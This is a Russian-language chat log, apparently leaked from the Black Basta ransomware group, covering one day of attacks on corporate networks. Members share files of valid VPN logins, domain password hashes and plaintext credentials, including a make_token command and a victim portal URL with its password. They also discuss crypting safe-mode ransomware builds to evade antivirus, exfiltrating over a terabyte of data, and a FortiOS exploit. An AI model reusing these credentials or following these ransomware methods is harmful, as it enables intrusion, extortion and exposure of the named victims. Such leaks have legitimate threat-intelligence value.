@lapa:matrix.bestflowers247.online
VALID_BRUT_CISCO.txt
2024-05-08 09:10:05
@lapa:matrix.bestflowers247.online
PALO_VALID.txt
2024-05-08 09:10:05
@lapa:matrix.bestflowers247.online
SOPHOS_VALID.txt
2024-05-08 09:10:06
@lapa:matrix.bestflowers247.online
SONIC_VALID.txt
2024-05-08 09:10:06
@lapa:matrix.bestflowers247.online
OKTA_VALID.txt
2024-05-08 09:10:07
@lapa:matrix.bestflowers247.online
WG_VALID.txt
2024-05-08 09:10:07
@lapa:matrix.bestflowers247.online
VALID_BRUT_RDWEB.txt
2024-05-08 09:10:24
@lapa:matrix.bestflowers247.online
VALID_BRUT_SONIC.txt
2024-05-08 09:10:31
@nickolas:talks.icu
У меня за вчера где то 15 таргетов, все +- ярд, все жило какое то время, и везде по итогу выпил.
2024-05-08 09:13:23
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> посмотри какой валид по ним
2024-05-08 09:18:19
Black Basta
есть кто ?
2024-05-08 09:18:23
Black Basta
тут ?
2024-05-08 09:21:02
Black Basta
4a104d1cfb230ed8fadc3a0bc40eff8ae150691fc0f915bc386232ab790f5ef1
2024-05-08 09:21:16
Black Basta
++
2024-05-08 09:21:52
Black Basta
PULSE_VALID.txt
2024-05-08 09:21:59
Black Basta
FORTI_VALID.txt
2024-05-08 09:22:05
Black Basta
CISCO_VALID_ITEMS.txt
2024-05-08 09:22:10
Black Basta
AUTH_VALID.txt
2024-05-08 09:22:16
Black Basta
VALID_BRUT_CISCO.txt
2024-05-08 09:22:23
Black Basta
PALO_VALID.txt
2024-05-08 09:22:34
@burito:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> есть кто ?
2024-05-08 09:22:41
@burito:matrix.bestflowers247.online
Да, спасибо
2024-05-08 09:23:40
Black Basta
SOPHOS_VALID.txt
2024-05-08 09:23:46
Black Basta
SONIC_VALID.txt
2024-05-08 09:23:52
Black Basta
OKTA_VALID.txt
2024-05-08 09:23:59
Black Basta
WG_VALID.txt
2024-05-08 09:24:06
Black Basta
VALID_BRUT_RDWEB.txt
2024-05-08 09:24:16
Black Basta
VALID_BRUT_SONIC.txt
2024-05-08 09:24:29
Black Basta
давай локер криптанем
2024-05-08 09:24:41
Black Basta
надо билды сделать с сейф модом
2024-05-08 09:24:51
@burito:matrix.bestflowers247.online
Давай
2024-05-08 09:24:54
Black Basta
супер
2024-05-08 09:24:55
@usernameww:matrix.bestflowers247.online
id:ed79b241-a7dd-4890-b32d-84e515772cdf
2024-05-08 09:24:58
Black Basta
сейчас скику
2024-05-08 09:25:04
Black Basta
* сейчас скину
2024-05-08 09:26:05
Black Basta
Enable safe mode?
2024-05-08 09:26:10
Black Basta
у BB4
2024-05-08 09:26:18
Black Basta
работает норм ?
2024-05-08 09:26:48
@usernameyy:matrix.bestflowers247.online
не тестировал со времен бб2, могу проверить
2024-05-08 09:28:06
Black Basta
проверь плз
2024-05-08 09:28:12
@usernameyy:matrix.bestflowers247.online
в процессе
2024-05-08 09:28:13
Black Basta
я сбилжу и отдам на крипт
2024-05-08 09:28:50
Black Basta
ed79b241-a7dd-4890-b32d-84e515772cdf_encrypt_release_allsystem_x64_safe.ex
2024-05-08 09:28:51
Black Basta
ed79b241-a7dd-4890-b32d-84e515772cdf_encrypt_release_allsystem_x64_safe.dll
2024-05-08 09:28:58
Black Basta
два файла локера
2024-05-08 09:29:02
Black Basta
ехе и dll
2024-05-08 09:29:07
@burito:matrix.bestflowers247.online
Пилю
2024-05-08 09:29:15
Black Basta
сделай как вчера
2024-05-08 09:29:20
Black Basta
хорошо отработал на силансе
2024-05-08 09:29:28
@burito:matrix.bestflowers247.online
Хорошо
2024-05-08 09:29:35
@usernameyy:matrix.bestflowers247.online
да, работает
2024-05-08 09:32:21
Black Basta
кошель надо еще твой
2024-05-08 09:32:55
@usernameyy:matrix.bestflowers247.online
```
2024-05-08 09:33:50
Black Basta
58db4fbe84b81a8b2cbef54fb2cd2e6d714d4892cabdac24d8d2d2c5aee61850
2024-05-08 09:33:58
@usernameyy:matrix.bestflowers247.online
есть, спасибо
2024-05-08 09:34:12
Black Basta
++
2024-05-08 09:37:56
@usernamenn:matrix.bestflowers247.online
`almob.ds.sjhs.com\dodri401-almob dfc105c949f95c0da039f9d2c49d0445`
2024-05-08 09:38:38
Black Basta
Ты на тачках видишь залоченые файлы ?
2024-05-08 09:38:56
@usernamenn:matrix.bestflowers247.online
я не лажу по ним
2024-05-08 09:39:08
@muaddib6:matrix.org
Занимаюсь
2024-05-08 09:39:23
@usernamenn:matrix.bestflowers247.online
я сканю
2024-05-08 09:39:29
@usernamenn:matrix.bestflowers247.online
ищу куда еще забурится
2024-05-08 09:39:51
Black Basta
++
2024-05-08 09:42:22
@usernamenn:matrix.bestflowers247.online
`almob.ds.sjhs.com\lawrek02-almob 9412c42c0d5115018a8bca2f22114341`
2024-05-08 09:42:44
@usernamenn:matrix.bestflowers247.online
пиздец даты мало скачано почти 1тб
2024-05-08 09:42:48
@usernamenn:matrix.bestflowers247.online
это мало
2024-05-08 09:43:16
Black Basta
качается еще
2024-05-08 09:43:19
Black Basta
не топаем
2024-05-08 09:43:30
Black Basta
* не стопаем
2024-05-08 09:46:25
@usernamenn:matrix.bestflowers247.online
сколько щас даты?
2024-05-08 09:47:38
@burito:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ехе и dll
2024-05-08 09:47:39
@burito:matrix.bestflowers247.online
cr.zip
2024-05-08 10:00:26
Black Basta
ща скажу
2024-05-08 10:00:34
Black Basta
cr.zip
2024-05-08 10:00:42
Black Basta
без префикса _1 вчерашний вариант, с _1 - новый
2024-05-08 10:00:57
Black Basta
++
2024-05-08 10:01:07
Black Basta
1,2Tb
2024-05-08 10:01:48
Black Basta
локнули креды
2024-05-08 10:01:53
@usernameww:matrix.bestflowers247.online
`make_token DS\dlollar-ea aXkS83H(EhPT`
2024-05-08 10:01:54
Black Basta
надо еще креды для просыла
2024-05-08 10:01:58
Black Basta
какие все читают
2024-05-08 10:02:04
Black Basta
make_token DS\dlollar-ea aXkS83H(EhPT
2024-05-08 10:02:08
Black Basta
эти уебали нам
2024-05-08 10:04:18
Black Basta
как заупскать ехе и dll
2024-05-08 10:04:22
Black Basta
сейф ?
2024-05-08 10:04:27
Black Basta
там аргумент надо какой то ?
2024-05-08 10:04:52
@usernameyy:matrix.bestflowers247.online
dll не будет сейф мода, запустить надо от имени администратора
2024-05-08 10:05:04
@usernameyy:matrix.bestflowers247.online
без аргументов
2024-05-08 10:05:09
@usernameyy:matrix.bestflowers247.online
аргументы никакие не учитываются
2024-05-08 10:08:13
@usernamenn:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> 1,2Tb
2024-05-08 10:08:26
@usernamenn:matrix.bestflowers247.online
от каких трастов надо? достану
2024-05-08 10:08:29
@usernamenn:matrix.bestflowers247.online
доменных
2024-05-08 10:09:00
@usernamett:matrix.bestflowers247.online
```
2024-05-08 10:09:10
Black Basta
по все
2024-05-08 10:09:13
Black Basta
глобал надо
2024-05-08 10:09:42
Black Basta
ww напишет сейчас
2024-05-08 10:11:11
@usernamenn:matrix.bestflowers247.online
ok
2024-05-08 10:20:50
@muaddib6:matrix.org
> <@usernamegg:matrix.bestflowers247.online> sent a file.
2024-05-08 10:21:07
@muaddib6:matrix.org
1.7z
2024-05-08 10:26:57
Black Basta
как проверить что тачка в сейф моде лочится ?
2024-05-08 10:27:11
Black Basta
что именно она в этот ммомент в локе в сейф моде
2024-05-08 10:27:21
@usernameyy:matrix.bestflowers247.online
если уже ушла в сейф то 100% лочится
2024-05-08 10:27:27
@usernameyy:matrix.bestflowers247.online
наверное никак не проверить в лайве
2024-05-08 10:27:32
@usernameyy:matrix.bestflowers247.online
там интернета не будет
2024-05-08 10:27:57
@usernameyy:matrix.bestflowers247.online
придется подождать пока лок кончится
2024-05-08 10:28:48
Black Basta
ее можно прочитать ?
2024-05-08 10:28:52
Black Basta
нет
2024-05-08 10:28:54
Black Basta
не читает
2024-05-08 10:28:55
@usernameyy:matrix.bestflowers247.online
нет
2024-05-08 10:29:04
@usernameyy:matrix.bestflowers247.online
там сервисы доменные не поднимаются в сейфе
2024-05-08 10:29:14
Black Basta
тачка просто обычная
2024-05-08 10:29:17
Black Basta
где запустили
2024-05-08 10:29:21
Black Basta
уже прошло норм времени
2024-05-08 10:29:25
Black Basta
не вернулась еще
2024-05-08 10:29:31
Black Basta
она вернется ?
2024-05-08 10:29:36
@usernameyy:matrix.bestflowers247.online
вернётся
2024-05-08 10:29:50
@usernameyy:matrix.bestflowers247.online
а даты много там?
2024-05-08 10:33:12
Black Basta
Снимок экрана 2024-05-08 в 13.32.00.png
2024-05-08 10:33:13
Black Basta
ANDC2WCRS0002.DS.SJHS.COM 10.240.47.77 Windows Server 2019 Standard
2024-05-08 10:33:55
@usernamett:matrix.bestflowers247.online
image.png
2024-05-08 10:39:24
Black Basta
WIGLEWCPA4544.DS.SJHS.COM 10.232.87.229 Windows Server 2019 Standard
2024-05-08 10:39:37
Black Basta
Снимок экрана 2024-05-08 в 13.37.25.png
2024-05-08 10:50:20
@lapa:matrix.bestflowers247.online
может мелкор еще посмотрим эксплоит?
2024-05-08 10:51:06
@lapa:matrix.bestflowers247.online
вдруг он найдет как через этот эксплоит правильно создать нового пользователя впн допустим
2024-05-08 10:53:12
@usernamezz:matrix.bestflowers247.online
adm_kekhash.txt
2024-05-08 11:11:35
@nickolas:talks.icu
Субару я так понимаю отдаю дальше ?
2024-05-08 11:11:51
@nickolas:talks.icu
Никакого финального ответа от тебя не получил по ним.
2024-05-08 11:14:10
Black Basta
отдавай
2024-05-08 11:14:40
Black Basta
не набрутилось
2024-05-08 11:15:04
Black Basta
> <@nickolas:talks.icu> У меня за вчера где то 15 таргетов, все +- ярд, все жило какое то время, и везде по итогу выпил.
2024-05-08 11:15:09
Black Basta
я не все видел 15шт
2024-05-08 11:15:40
@nickolas:talks.icu
Да, результат офигенный, мы получили большой опыт + сейчас проделываем работу над ошибками.
2024-05-08 11:16:00
@nickolas:talks.icu
Да, потому что часть уходила к нам.
2024-05-08 11:16:22
Black Basta
ок
2024-05-08 11:17:28
@nickolas:talks.icu
Добавь keytronic.com_приват к нам в пользователю.
2024-05-08 11:19:31
Black Basta
проверь
2024-05-08 11:19:36
Black Basta
добавил
2024-05-08 11:20:35
@nickolas:talks.icu
Все так же, ни вижу их.
2024-05-08 11:21:16
@nickolas:talks.icu
Видимо разработчик что-то сломал, когда делал доработки по админке
2024-05-08 11:21:52
@nickolas:talks.icu
Я обновил страницу, сделал ре-логин в админку.
2024-05-08 11:23:01
Black Basta
тор тормозит блин
2024-05-08 11:23:23
@nickolas:talks.icu
Разберитесь плз, я отойду на часик.
2024-05-08 11:23:31
Black Basta
все ок у тебя
2024-05-08 11:23:32
Black Basta
проврь
2024-05-08 11:52:16
@usernamenn:matrix.bestflowers247.online
можешь попросить что бы сделали дабл новый и сингл?
2024-05-08 11:53:49
Black Basta
Снимок экрана 2024-05-08 в 13.37.25.png
2024-05-08 11:53:54
Black Basta
WIGLEWCPA4544.DS.SJHS.COM 10.232.87.229 Windows Server 2019 Standard
2024-05-08 11:54:40
Black Basta
вернулась тачка по которой я сам лично запускал
2024-05-08 11:55:01
Black Basta
ничего тут не залочилось
2024-05-08 11:55:03
Black Basta
Снимок экрана 2024-05-08 в 14.54.21.png
2024-05-08 11:55:25
Black Basta
```
2024-05-08 11:55:29
Black Basta
тут все открыто
2024-05-08 11:55:37
Black Basta
```
2024-05-08 11:55:45
Black Basta
вот линк на фаил
2024-05-08 11:55:53
Black Basta
которым лочил и команда запуска
2024-05-08 11:56:07
Black Basta
да
2024-05-08 11:56:10
Black Basta
уже
2024-05-08 11:56:15
Black Basta
и симку меняй
2024-05-08 11:56:31
Black Basta
а лучше локацию )
2024-05-08 11:56:42
@usernamenn:matrix.bestflowers247.online
да я не об этом
2024-05-08 11:56:49
@usernamenn:matrix.bestflowers247.online
я синглом этим уже пользуюсь месяца 2-3
2024-05-08 11:57:00
@usernamenn:matrix.bestflowers247.online
но дабл менялся хотя бы
2024-05-08 11:57:13
@usernamenn:matrix.bestflowers247.online
симки то часто меняю
2024-05-08 11:57:17
Black Basta
я потушу сегодня все
2024-05-08 11:57:34
Black Basta
все даблы и синглы
2024-05-08 11:57:34
@usernameyy:matrix.bestflowers247.online
там нет нужного сервиса
2024-05-08 11:57:36
@usernameyy:matrix.bestflowers247.online
не запустится
2024-05-08 11:57:38
@usernamenn:matrix.bestflowers247.online
ну симки обычно у меня жили 2 недели, не пополнял даж их
2024-05-08 11:57:50
@usernameyy:matrix.bestflowers247.online
переделаю на создание сервиса в таком случае
2024-05-08 11:57:59
@usernamenn:matrix.bestflowers247.online
тушить надо все кобы будет где была эта сетка и все linux причастные
2024-05-08 11:58:02
Black Basta
не понял
2024-05-08 11:58:05
@usernamenn:matrix.bestflowers247.online
ну и впны и симки тоже нахуй
2024-05-08 11:58:09
@usernamenn:matrix.bestflowers247.online
мало ли)
2024-05-08 11:58:14
@usernameyy:matrix.bestflowers247.online
локер использует сервис Fax для хайджека
2024-05-08 11:58:19
@usernameyy:matrix.bestflowers247.online
его нет на этой машине, винда обрезана
2024-05-08 11:58:46
Black Basta
сейф безе этого сервиса не работает ?
2024-05-08 11:58:48
@usernamenn:matrix.bestflowers247.online
че то не хочется фотку с орлами ))
2024-05-08 11:58:51
@usernameyy:matrix.bestflowers247.online
да
2024-05-08 11:58:54
@usernamenn:matrix.bestflowers247.online
на сайте фбра))
2024-05-08 11:58:59
@usernamenn:matrix.bestflowers247.online
🦅
2024-05-08 11:59:29
@usernamenn:matrix.bestflowers247.online
🦋
2024-05-08 11:59:32
@usernamenn:matrix.bestflowers247.online
🦅
2024-05-08 12:00:57
Black Basta
мы сейчас отправили 130 000 машин запустили сейчас и отправили в сейф мод
2024-05-08 12:01:07
Black Basta
какой твой вердикт ?
2024-05-08 12:01:46
@usernameyy:matrix.bestflowers247.online
Этот сервис есть везде как правило
2024-05-08 12:02:11
Black Basta
я тыкнул просто на тачку из списка
2024-05-08 12:02:20
Black Basta
и на ней не оказалось ?
2024-05-08 12:02:32
@usernameyy:matrix.bestflowers247.online
на ней нет этого сервиса
2024-05-08 12:02:58
Black Basta
> <@usernameyy:matrix.bestflowers247.online> Этот сервис есть везде как правило
2024-05-08 12:03:42
Black Basta
ты берешь сервис и не предусмотрел что его не может быть ?
2024-05-08 12:03:57
Black Basta
чужой сервис
2024-05-08 12:04:02
@usernameyy:matrix.bestflowers247.online
это системный сервис, я не могу предусмотреть отключение системных сервисов
2024-05-08 12:05:41
Black Basta
у нас сейчас пиздец какие ав
2024-05-08 12:05:44
Black Basta
силанс
2024-05-08 12:05:52
Black Basta
мы с нимповерх ничего не залочим
2024-05-08 12:06:12
Black Basta
нам надо сделать сейф мод как часы
2024-05-08 12:06:35
@usernameyy:matrix.bestflowers247.online
дай айди компании
2024-05-08 12:06:39
@usernameyy:matrix.bestflowers247.online
для билда локера
2024-05-08 12:06:43
Black Basta
что бы мы могли запускать с любым ав через сейф
2024-05-08 12:06:57
Black Basta
id:ed79b241-a7dd-4890-b32d-84e515772cdf
2024-05-08 12:07:30
Black Basta
хорошо
2024-05-08 12:08:11
Black Basta
http://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx6o77yvmpwt7gklffqd.onion/
2024-05-08 12:08:26
Black Basta
блог не грузиться
2024-05-08 12:08:46
@usernameyy:matrix.bestflowers247.online
какая ошибка
2024-05-08 12:16:16
@usernameyy:matrix.bestflowers247.online
> <@usernameyy:matrix.bestflowers247.online> переделаю на создание сервиса в таком случае
2024-05-08 12:16:22
@usernameyy:matrix.bestflowers247.online
силанск работает в сейф моде?
2024-05-08 12:18:41
@usernameyy:matrix.bestflowers247.online
я сделал не системный сервис (Ngc1Svc, можете попробовать, но если там ав в сейфмоде, то сомневаюсь, что поможет
2024-05-08 12:18:45
@usernameyy:matrix.bestflowers247.online
* я сделал не системный сервис (Ngc1Svc), можете попробовать, но если там ав в сейфмоде, то сомневаюсь, что поможет
2024-05-08 12:20:01
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> не вернулась еще
2024-05-08 12:20:49
Black Basta
от бурито обходит крипт
2024-05-08 12:20:57
Black Basta
силонс ему не помеха
2024-05-08 12:21:03
Black Basta
дело не в этом
2024-05-08 12:21:15
Black Basta
сейчас будем использовать сейф мод все чаще
2024-05-08 12:21:21
Black Basta
криптовать и запскать
2024-05-08 12:21:24
Black Basta
сейф
2024-05-08 12:22:58
@usernameyy:matrix.bestflowers247.online
дай мне файл криптованный
2024-05-08 12:23:00
Black Basta
ты тут ?
2024-05-08 12:23:02
@usernameyy:matrix.bestflowers247.online
я лучше его проверю
2024-05-08 12:23:04
@usernameyy:matrix.bestflowers247.online
на всякий случай
2024-05-08 12:23:22
Black Basta
cr.zip
2024-05-08 12:23:28
Black Basta
без префикса _1 вчерашний вариант, с _1 - новый
2024-05-08 12:23:46
Black Basta
ехе
2024-05-08 12:23:51
Black Basta
без префикса запускали
2024-05-08 12:25:33
@usernameyy:matrix.bestflowers247.online
это просто крипт не работает, а не что-то не так с машиной
2024-05-08 12:25:47
@usernameyy:matrix.bestflowers247.online
не создается сервис, а в оригинале создается
2024-05-08 12:25:52
Black Basta
ds\skrie013-ds aXkS83H(EhPT
2024-05-08 12:26:35
@nickolas:talks.icu
Появилось, спасибо!
2024-05-08 12:26:52
@usernameyy:matrix.bestflowers247.online
со второго запуска причем создалось
2024-05-08 12:27:22
@nickolas:talks.icu
О, вчерашняя сеть в сети!
2024-05-08 12:27:25
Black Basta
криптованым создался ?
2024-05-08 12:27:31
@usernameyy:matrix.bestflowers247.online
да
2024-05-08 12:27:36
@nickolas:talks.icu
> <@nickolas:talks.icu> ```
2024-05-08 12:27:40
Black Basta
какая
2024-05-08 12:27:43
Black Basta
давай сокс
2024-05-08 12:27:49
@usernameyy:matrix.bestflowers247.online
даже если его изначально не было он создается
2024-05-08 12:28:38
@nickolas:talks.icu
Сокс все тот же, все данные те же самые, которые указаны в сообщении
2024-05-08 12:28:48
Black Basta
почему не залочило ?
2024-05-08 12:29:08
Black Basta
сейчас 130 000 в сейфмоде
2024-05-08 12:29:13
@usernameyy:matrix.bestflowers247.online
там нет созданного сервиса
2024-05-08 12:29:15
Black Basta
какой твой вердикт ?
2024-05-08 12:29:28
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> сейчас 130 000 в сейфмоде
2024-05-08 12:29:39
@usernameyy:matrix.bestflowers247.online
там либо ав, либо еще что-то, не в локере проблема
2024-05-08 12:29:41
Black Basta
ну вот эта же ушла
2024-05-08 12:29:46
Black Basta
на моих глазах
2024-05-08 12:29:52
@usernameyy:matrix.bestflowers247.online
значит ав там
2024-05-08 12:30:00
@usernameyy:matrix.bestflowers247.online
сервиса на ней нет
2024-05-08 12:30:14
@usernameyy:matrix.bestflowers247.online
меня отключило от рдп
2024-05-08 12:30:32
Black Basta
дак локер криптованный
2024-05-08 12:30:44
Black Basta
могу запутсить сейчас просто криптованный фаил и она там выебет все
2024-05-08 12:30:51
Black Basta
хочешь ?
2024-05-08 12:30:55
Black Basta
потом зайдешь посмотришь
2024-05-08 12:31:06
@usernameyy:matrix.bestflowers247.online
ну так и также можешь запустить сейф на любой виртуалке и он отработает)
2024-05-08 12:31:38
Black Basta
я могу впску сейчас свою пожертовать свою
2024-05-08 12:31:46
@usernameyy:matrix.bestflowers247.online
давай
2024-05-08 12:32:06
@usernameyy:matrix.bestflowers247.online
данные скинь
2024-05-08 12:32:58
@usernameyy:matrix.bestflowers247.online
у меня у самого win 10 на виртуалке, это то же, что и server 2019, так что 100% работает этот файл
2024-05-08 12:38:35
Black Basta
500kk https://external.jsg.com/logon/LogonPoint/tmindex.html :cyn.mit:Spring2024!
2024-05-08 12:39:04
Black Basta
Windows Server 2019 USA GG
2024-05-08 12:39:08
Black Basta
запустил на ней
2024-05-08 12:39:19
@usernameyy:matrix.bestflowers247.online
криптованный?
2024-05-08 12:39:23
Black Basta
да
2024-05-08 12:39:25
Black Basta
тот же самый
2024-05-08 12:39:27
@usernameyy:matrix.bestflowers247.online
так он не работает
2024-05-08 12:39:38
@usernameyy:matrix.bestflowers247.online
> <@usernameyy:matrix.bestflowers247.online> это просто крипт не работает, а не что-то не так с машиной
2024-05-08 12:39:57
Black Basta
ну а как
2024-05-08 12:40:07
Black Basta
крипт не работает ?
2024-05-08 12:40:17
@usernameyy:matrix.bestflowers247.online
надо попросить криптора сделать, чтобы работал сервис
2024-05-08 12:40:20
Black Basta
ты же сказал что со второго раза он отработал
2024-05-08 12:40:30
@usernameyy:matrix.bestflowers247.online
он создал сервис, а дальше всё
2024-05-08 12:40:59
Black Basta
объясни
2024-05-08 12:41:41
@usernameyy:matrix.bestflowers247.online
в локере 2 функции входа, 1 это главная обычный запуск, 2 это запуск сервиса, я полагаю, что крипт это не учитывает и в итоге вход только один, а нужно чтобы 2 осталось
2024-05-08 12:42:59
Black Basta
ed79b241-a7dd-4890-b32d-84e515772cdf_encrypt_release_allsystem_x64_safe.ex
2024-05-08 12:45:59
Black Basta
сервси не работает а надо что бы работал в локере 2 функции входа, 1 это главная обычный запуск, 2 это запуск сервиса, я полагаю, что крипт это не учитывает и в итоге вход только один, а нужно чтобы 2 осталось
2024-05-08 12:46:22
Black Basta
> <@burito:matrix.bestflowers247.online> sent a file.
2024-05-08 12:46:39
Black Basta
> <@burito:matrix.bestflowers247.online> sent a file.
2024-05-08 12:53:54
@n3auxaxl:matrix.collectionofmanager.space
lf
2024-05-08 12:53:59
@n3auxaxl:matrix.collectionofmanager.space
да
2024-05-08 12:54:16
@n3auxaxl:matrix.collectionofmanager.space
занимаюсь щас загрузкой по фтп файлов
2024-05-08 12:54:19
@n3auxaxl:matrix.collectionofmanager.space
ну боф
2024-05-08 12:54:21
@n3auxaxl:matrix.collectionofmanager.space
для NN
2024-05-08 12:55:27
@nickolas:talks.icu
Работает сокс?
2024-05-08 12:55:57
Black Basta
да ок уже тут презентовал нам ее
2024-05-08 12:56:02
@nickolas:talks.icu
Могу попробовать что то переподнять , если оно нужно
2024-05-08 12:56:26
Black Basta
а тот же самый сокс ?
2024-05-08 12:56:33
Black Basta
```
2024-05-08 12:56:48
@nickolas:talks.icu
Ну подключение будет такое же.
2024-05-08 12:57:19
@nickolas:talks.icu
просто рестарт, чем тебе плох сокс, скажи свои хотелки, я возможно их реализую, если это технический возможно.
2024-05-08 13:01:02
Black Basta
работает
2024-05-08 13:01:21
@nickolas:talks.icu
долго же вы проверяли )))
2024-05-08 13:01:29
Black Basta
не
2024-05-08 13:01:33
Black Basta
сразу
2024-05-08 13:01:49
@nickolas:talks.icu
забирайте плз сразу, потому что сам знаешь, окно бывает достаточно не продолжительным.
2024-05-08 13:02:04
@nickolas:talks.icu
Могу дц через шелл глянуть, что бы упростить тебе задачу
2024-05-08 13:02:24
Black Basta
не надо
2024-05-08 13:02:39
Black Basta
ничего не делай
2024-05-08 13:02:57
@nickolas:talks.icu
Хорошо, если нужно будет что-то снять - пиши, все сделаю.
2024-05-08 13:04:07
@n3auxaxl:matrix.collectionofmanager.space
> <@usernamegg:matrix.bestflowers247.online> да ок уже тут презентовал нам ее
2024-05-08 13:04:16
@nickolas:talks.icu
Я по стараюсь лишний раз ничего на хосте не тыкать, когда он к нам приходит.
2024-05-08 13:04:48
@nickolas:talks.icu
Я думаю сразу в сием появляется алерт среднего уровня, об использовании разведки на хосте.
2024-05-08 13:06:30
Black Basta
вечером типа будет готова
2024-05-08 13:06:47
Black Basta
он просто не знает твои реальные сроки
2024-05-08 13:07:13
@n3auxaxl:matrix.collectionofmanager.space
я вчера же сделал быстро
2024-05-08 13:07:27
@n3auxaxl:matrix.collectionofmanager.space
ну который загрузчик
2024-05-08 13:07:31
@n3auxaxl:matrix.collectionofmanager.space
и эту уже почти сделал, тут одна херня
2024-05-08 13:07:39
@n3auxaxl:matrix.collectionofmanager.space
к фтп подключается, но не загружает туда
2024-05-08 13:07:44
@n3auxaxl:matrix.collectionofmanager.space
единсвтенная проблема
2024-05-08 13:08:24
Black Basta
ну да, вчера возможно быстро )
2024-05-08 13:08:27
Black Basta
молодец
2024-05-08 13:09:26
@burito:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> сервси не работает а надо что бы работал в локере 2 функции входа, 1 это главная обычный запуск, 2 это запуск сервиса, я полагаю, что крипт это не учитывает и в итоге вход только один, а нужно чтобы 2 осталось
2024-05-08 13:09:46
@burito:matrix.bestflowers247.online
DllRegisterServer добавить?
2024-05-08 13:22:49
@chuck:talks.icu
привет
2024-05-08 13:24:04
Black Basta
Снимок экрана 2024-05-08 в 16.23.45.png
2024-05-08 13:24:36
@usernameyy:matrix.bestflowers247.online
> <@usernameyy:matrix.bestflowers247.online> dll не будет сейф мода, запустить надо от имени администратора
2024-05-08 13:25:20
Black Basta
dll сейфмод не работает
2024-05-08 13:25:32
Black Basta
только ехе интересует меня
2024-05-08 13:28:20
@chuck:talks.icu
секретные разработки пентагона )
2024-05-08 13:28:39
@usernameyy:matrix.bestflowers247.online
> <@usernameyy:matrix.bestflowers247.online> в локере 2 функции входа, 1 это главная обычный запуск, 2 это запуск сервиса, я полагаю, что крипт это не учитывает и в итоге вход только один, а нужно чтобы 2 осталось
2024-05-08 13:28:42
Black Basta
ок
2024-05-08 13:29:04
Black Basta
там сокс который поднимаем это ты написал ?
2024-05-08 13:29:10
Black Basta
на чем он написан ?
2024-05-08 13:29:39
@burito:matrix.bestflowers247.online
не знаю почему
2024-05-08 13:29:41
Black Basta
что именно не работает - я не знаю, это только предположение. Вообще вход у сервиса ServiceMain, а у обычного WinMain
2024-05-08 13:30:10
Black Basta
> <@usernamegg:matrix.bestflowers247.online> Windows Server 2019 USA GG
2024-05-08 13:30:20
@iamnurnazarov:matrix.org
привет, готов к работе
2024-05-08 13:31:21
@burito:matrix.bestflowers247.online
ехе надо и ехе не рботает в сейфмод?
2024-05-08 13:31:32
@manager361:colorado.su
привет
2024-05-08 13:31:34
Black Basta
да
2024-05-08 13:31:46
Black Basta
от хана не проверял
2024-05-08 13:31:52
@burito:matrix.bestflowers247.online
а оригинал ок?
2024-05-08 13:31:58
@usernameyy:matrix.bestflowers247.online
не вернется, не работает сервис)
2024-05-08 13:31:59
Black Basta
1.7z
2024-05-08 13:32:09
Black Basta
вот проверь от другого
2024-05-08 13:32:10
@usernameyy:matrix.bestflowers247.online
только оригинал мой работает
2024-05-08 13:32:11
Black Basta
криптера
2024-05-08 13:32:15
@muaddib6:matrix.org
чекни от меня тож
2024-05-08 13:32:15
@usernameyy:matrix.bestflowers247.online
минутку
2024-05-08 13:32:43
Black Basta
эксплойт надо посмотреть тебе
2024-05-08 13:33:22
Black Basta
может ты поймешь как через этот эксплоит правильно создать нового пользователя впн допустим?
2024-05-08 13:34:16
@usernameyy:matrix.bestflowers247.online
отработал
2024-05-08 13:34:17
Black Basta
FortiOS-2024-21762.7z
2024-05-08 13:34:56
Black Basta
отдал мелкору на разбор
2024-05-08 13:35:09
Black Basta
от хана
2024-05-08 13:35:25
@lapa:matrix.bestflowers247.online
+
2024-05-08 13:35:38
Black Basta
170.130.165.84
2024-05-08 13:35:38
@usernameyy:matrix.bestflowers247.online
а вы сетку залочили то в итоге обычным не сейфом?
2024-05-08 13:35:45
@usernameyy:matrix.bestflowers247.online
а то я смотрю ты всех отпустил
2024-05-08 13:35:53
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> от хана
2024-05-08 13:35:56
Black Basta
нет не обычным
2024-05-08 13:35:59
Black Basta
криптованным
2024-05-08 13:36:05
Black Basta
там уже все ушло в офф
2024-05-08 13:36:10
Black Basta
мы ничего сделать не смогли
2024-05-08 13:36:16
@chuck:talks.icu
на с++ написан
2024-05-08 13:36:24
Black Basta
тебе что каждый раз отдавать на проврку фаил после крипта ?
2024-05-08 13:36:27
Black Basta
от сейф мода
2024-05-08 13:36:32
@chuck:talks.icu
в секретных лабораториях пентагона )
2024-05-08 13:36:36
Black Basta
от тебя работает все четко
2024-05-08 13:36:36
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> там уже все ушло в офф
2024-05-08 13:36:42
Black Basta
только что проверил
2024-05-08 13:36:48
Black Basta
сейчас на еще одной проверю
2024-05-08 13:36:48
@usernameyy:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> тебе что каждый раз отдавать на проврку фаил после крипта ?
2024-05-08 13:36:55
@usernameyy:matrix.bestflowers247.online
софт же не меняется каждый день
2024-05-08 13:37:10
Black Basta
> <@usernameyy:matrix.bestflowers247.online> так они возвращаются судя по тем впс что ты дал
2024-05-08 13:37:14
@usernameyy:matrix.bestflowers247.online
пиздец
2024-05-08 13:38:41
Black Basta
да я понял понял ) в самых секретных )
2024-05-08 13:39:54
Black Basta
там достпу только с CMD?
2024-05-08 13:40:13
@chuck:talks.icu
ну да, пока только cmd
2024-05-08 13:40:30
@chuck:talks.icu
возможно файлменеджер сделаем
2024-05-08 13:40:33
Black Basta
этого достаточно, не нагружай софт
2024-05-08 13:41:13
@burito:matrix.bestflowers247.online
@usernamegg:matrix.bestflowers247.online
2024-05-08 13:41:14
@burito:matrix.bestflowers247.online
cr.zip
2024-05-08 13:41:25
@burito:matrix.bestflowers247.online
вот еще вариант
2024-05-08 13:41:47
Black Basta
Снимок экрана 2024-05-08 в 16.41.31.png
2024-05-08 13:43:08
Black Basta
Снимок экрана 2024-05-08 в 16.42.46.png
2024-05-08 13:44:29
